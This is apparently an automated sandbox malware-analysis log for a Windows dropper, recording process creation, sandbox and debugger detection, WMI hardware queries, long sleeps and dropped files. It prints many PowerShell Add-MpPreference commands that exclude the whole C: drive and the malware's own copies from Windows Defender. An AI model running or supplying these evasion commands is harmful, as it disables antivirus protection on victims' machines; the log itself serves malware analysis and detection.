                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Memory allocated: C00000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Memory allocated: 1A9C0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Memory allocated: 1970000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Memory allocated: 1B1B0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1210
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1347
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2868
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 956
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1307
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2114
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1368
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1036
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1190
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1098
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1277
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1156
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1330
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1148
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1244
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 912
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1307
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1255
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Window / User API: threadDelayed 7880
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Window / User API: threadDelayed 1396
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kCewxyIz.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KRFbuSND.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kKNOcijE.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VVwrSJqk.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kwtgfRAG.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iczfvMBI.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ufMwPuFo.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AXpVrZKc.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EZcCRmIO.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MjEjEgzx.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cYVGOFtR.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vqImhKDh.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe TID: 7092 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432Thread sleep count: 912 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420Thread sleep count: 1307 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep count: 1255 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F0A69B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F1C220
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1E6A3 VirtualQuery,GetSystemInfo,0_2_00F1E6A3
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Thread delayed: delay time: 30000
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user\AppData
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File opened: C:\Users\user\AppData\Local
                                    Source: HyperPortContainerproviderinto.exe, 00000004.00000002.1917172574.000000001B387000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681051270.0000000003212000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: AaHCyFZRuOMjGDqdgJ.exe2.4.dr Binary or memory string: trnUQvMCIHI
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681051270.0000000003212000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yKZ
                                    Source: w32tm.exe, 0000002C.00000002.1845188043.000002AFC3060000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe API call chain: ExitProcess graph end node graph_0-25065
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F1F838
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F27DEE mov eax, dword ptr fs:[00000030h] 0_2_00F27DEE
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F2C030 GetProcessHeap,0_2_00F2C030
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1F9D5 SetUnhandledExceptionFilter,0_2_00F1F9D5
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F1FBCA
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F28EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F28EBD
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Memory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1F654 cpuid 0_2_00F1F654
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00F1AF0F
